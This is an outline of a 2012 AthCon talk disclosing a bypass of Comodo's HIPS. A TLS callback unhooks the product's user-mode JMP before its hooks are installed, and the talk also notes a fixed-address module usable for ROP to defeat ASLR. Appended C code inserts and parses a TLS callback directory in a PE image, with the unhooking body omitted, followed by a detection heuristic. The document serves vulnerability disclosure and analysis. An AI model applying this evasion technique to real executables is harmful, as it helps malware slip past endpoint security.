athcon.org, Athens, 3-4 May 2012
Day 1, Track 1, 18:00-18:50
"0-Day - Comodo did it again", Glafkos Chralambous & George Nicolaou

0-Day - Comodo did it again

Comodo Internet Security Home
- Host Intrusion Prevention System (HIPS)

Disclosure timeline
- bottom line: they hung up the phone while waiting for their director

Comodo techniques
- hook the Nt* and Zw* functions for file access, memory access, network access and registry access
- the hooks are placed on the "wrong" side: in user mode, inside the address space of the very process being monitored, so code running in that process can reach the hooks and remove them

How?
- inject a payload that installs hooks on critical user-mode functions in ntdll.dll
- load a library, guard.dll, which installs the hooks
- on Windows 7 64-bit: the first instruction at the program's entry point (EP) is replaced with a JMP to the injected code
- on other Windows versions: the first instruction of ZwTestAlert is replaced with a JMP (the loader calls ZwTestAlert during thread start-up, before control reaches the entry point)

0day
- there is TLS (Thread Local Storage); the PE loader runs the image's TLS callbacks when the main thread is created, i.e. before the entry point (and before ZwTestAlert) executes
- a TLS callback can therefore uninstall the JMP before the hooks are ever installed
- see the _IMAGE_TLS_DIRECTORY32 structure:
    AddressOfIndex
    AddressOfCallBacks;   // PIMAGE_TLS_CALLBACK * - this is the interesting array

Process of exploitation
- create a malicious executable
- find somewhere to insert an IMAGE_TLS_DIRECTORY and the code that uninstalls the JMP instruction, and insert them
- point a TLS callback entry at that code

That's not all
- the HIPS code is mapped at a constant address, 0x71B00000, in all installations of the Comodo HIPS on all Windows versions
- and it contains executable code
- game over for ASLR: a module at a fixed address supplies ROP gadgets to the exploit of any other vulnerable application on the victim machine
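The exploitation steps above (insert an IMAGE_TLS_DIRECTORY, point a callback entry at your own code) amount to editing the PE so that the loader runs code before the entry point. The following is an added example, not code from the talk or from Comodo: it builds a minimal PE32 image in memory, adds an IMAGE_TLS_DIRECTORY32 with one callback, and then parses it back through DataDirectory[9] the way the loader does. The image base (0x400000), the section layout and the RVAs chosen for the directory, the callback array and the callback stub (0x1300) are assumptions for the example; the header field offsets are the documented PE32 ones. The callback body itself (on Windows: VirtualProtect the entry point or ZwTestAlert writable, copy the saved original bytes back, restore protection) is omitted because it is not portable, so only the file-format part runs here.

```c
/* Added example (not from the talk): build a PE32 image, add a TLS callback,
 * parse it back. Little-endian host assumed, as on the x86 targets discussed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_BASE    0x00400000u /* assumed preferred base; TLS fields are VAs */
#define IMAGE_SIZE    0x600u
#define E_LFANEW      0x80u
#define OPT_HDR_OFF   (E_LFANEW + 4 + 20)  /* "PE\0\0" + IMAGE_FILE_HEADER */
#define OPT_HDR_SIZE  0xE0u                /* PE32 optional header */
#define SECT_HDR_OFF  (OPT_HDR_OFF + OPT_HDR_SIZE)
#define TLS_DIR_INDEX 9                    /* IMAGE_DIRECTORY_ENTRY_TLS */
#define SECT_RVA      0x1000u
#define SECT_RAW      0x200u
#define SECT_SIZE     0x400u
#define TLS_DIR_RVA   0x1100u              /* assumed free space inside .text */
#define TLS_DATA_RVA  0x1200u              /* assumed: index slot + callback array */

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Map an RVA to a file offset through the section table; -1 if no section backs it. */
long rva_to_off(const uint8_t *img, uint32_t rva) {
    uint32_t pe = rd32(img + 0x3C);
    uint16_t nsec = rd16(img + pe + 6);
    uint32_t sh = pe + 4 + 20 + rd16(img + pe + 20);   /* first section header */
    for (uint16_t i = 0; i < nsec; i++, sh += 40) {
        uint32_t va = rd32(img + sh + 12), raw = rd32(img + sh + 16), ptr = rd32(img + sh + 20);
        if (rva >= va && rva < va + raw) return (long)(ptr + (rva - va));
    }
    return -1;
}

/* Lay out MZ/PE headers and one .text section whose entry point is a single "ret". */
void build_image(uint8_t *img) {
    memset(img, 0, IMAGE_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    wr32(img + 0x3C, E_LFANEW);
    memcpy(img + E_LFANEW, "PE\0\0", 4);
    wr16(img + E_LFANEW + 4, 0x14C);            /* IMAGE_FILE_MACHINE_I386 */
    wr16(img + E_LFANEW + 6, 1);                /* NumberOfSections */
    wr16(img + E_LFANEW + 20, OPT_HDR_SIZE);    /* SizeOfOptionalHeader */
    wr16(img + E_LFANEW + 22, 0x0102);          /* EXECUTABLE_IMAGE | 32BIT_MACHINE */
    wr16(img + OPT_HDR_OFF, 0x10B);             /* PE32 magic */
    wr32(img + OPT_HDR_OFF + 16, SECT_RVA);     /* AddressOfEntryPoint */
    wr32(img + OPT_HDR_OFF + 28, IMAGE_BASE);   /* ImageBase */
    wr32(img + OPT_HDR_OFF + 92, 16);           /* NumberOfRvaAndSizes */
    memcpy(img + SECT_HDR_OFF, ".text", 5);
    wr32(img + SECT_HDR_OFF + 8, SECT_SIZE);    /* VirtualSize */
    wr32(img + SECT_HDR_OFF + 12, SECT_RVA);    /* VirtualAddress */
    wr32(img + SECT_HDR_OFF + 16, SECT_SIZE);   /* SizeOfRawData */
    wr32(img + SECT_HDR_OFF + 20, SECT_RAW);    /* PointerToRawData */
    wr32(img + SECT_HDR_OFF + 36, 0x60000020);  /* CODE | EXECUTE | READ */
    img[SECT_RAW] = 0xC3;                       /* entry point: ret */
}

/* Write an IMAGE_TLS_DIRECTORY32 into free space and register it in DataDirectory[9].
 * The callback array gets one entry (callback_rva) plus the NULL terminator.
 * Returns 0 on success, -1 if the chosen RVAs are not backed by a section. */
int add_tls_callback(uint8_t *img, uint32_t callback_rva) {
    long dir = rva_to_off(img, TLS_DIR_RVA), dat = rva_to_off(img, TLS_DATA_RVA);
    if (dir < 0 || dat < 0) return -1;
    uint8_t *d = img + dir;
    /* Every field is a VA (ImageBase + RVA), not an RVA: with no .reloc section the
     * image must really load at IMAGE_BASE, or the loader follows stale pointers. */
    wr32(d + 0,  IMAGE_BASE + TLS_DATA_RVA + 0x10);   /* StartAddressOfRawData */
    wr32(d + 4,  IMAGE_BASE + TLS_DATA_RVA + 0x10);   /* EndAddressOfRawData (empty template) */
    wr32(d + 8,  IMAGE_BASE + TLS_DATA_RVA);          /* AddressOfIndex: loader stores the TLS index here */
    wr32(d + 12, IMAGE_BASE + TLS_DATA_RVA + 4);      /* AddressOfCallBacks */
    wr32(d + 16, 0);                                  /* SizeOfZeroFill */
    wr32(d + 20, 0);                                  /* Characteristics */
    wr32(img + dat + 4, IMAGE_BASE + callback_rva);   /* PIMAGE_TLS_CALLBACK[0] */
    wr32(img + dat + 8, 0);                           /* array terminator */
    uint32_t dd = OPT_HDR_OFF + 96 + TLS_DIR_INDEX * 8;
    wr32(img + dd, TLS_DIR_RVA);                      /* DataDirectory[9].VirtualAddress */
    wr32(img + dd + 4, 24);                           /* DataDirectory[9].Size */
    return 0;
}

/* Walk DataDirectory[9] -> IMAGE_TLS_DIRECTORY32 -> AddressOfCallBacks, the path the
 * loader takes before the entry point. Fills out[] with callback RVAs; returns the
 * count, 0 when there is no TLS directory, -1 on a malformed image. */
int list_tls_callbacks(const uint8_t *img, size_t len, uint32_t *out, int max) {
    uint32_t pe = rd32(img + 0x3C);
    if ((size_t)pe + 24 + 96 + 16 * 8 > len) return -1;
    uint32_t opt = pe + 4 + 20;
    uint32_t base = rd32(img + opt + 28);
    uint32_t dir_rva = rd32(img + opt + 96 + TLS_DIR_INDEX * 8);
    if (dir_rva == 0) return 0;
    long dir = rva_to_off(img, dir_rva);
    if (dir < 0 || (size_t)dir + 24 > len) return -1;
    uint32_t cb_va = rd32(img + dir + 12);
    if (cb_va < base) return -1;
    long cb = rva_to_off(img, cb_va - base);
    if (cb < 0) return -1;
    int n = 0;
    while (n < max && (size_t)cb + 4 * n + 4 <= len && rd32(img + cb + 4 * n) != 0) {
        out[n] = rd32(img + cb + 4 * n) - base;
        n++;
    }
    return n;
}

int main(void) {
    uint8_t img[IMAGE_SIZE];
    uint32_t cbs[4];
    build_image(img);
    add_tls_callback(img, 0x1300);   /* 0x1300: assumed location of the unhooking stub */
    int n = list_tls_callbacks(img, sizeof img, cbs, 4);
    for (int i = 0; i < n; i++) printf("TLS callback %d at RVA 0x%X\n", i, cbs[i]);
    return 0;
}
```

Two practical caveats follow from the format: the TLS directory fields hold virtual addresses, so an image without relocations must be loaded at its preferred base for the callback pointer to be valid, and a callback that patches the entry point or ZwTestAlert has to save the original bytes before the HIPS overwrites them (or carry a copy) and restore them with the right page protection. A defender can reverse the same walk: an executable whose DataDirectory[9] points at a callback array living in an unexpected section, or whose callback writes to code pages, is worth a closer look.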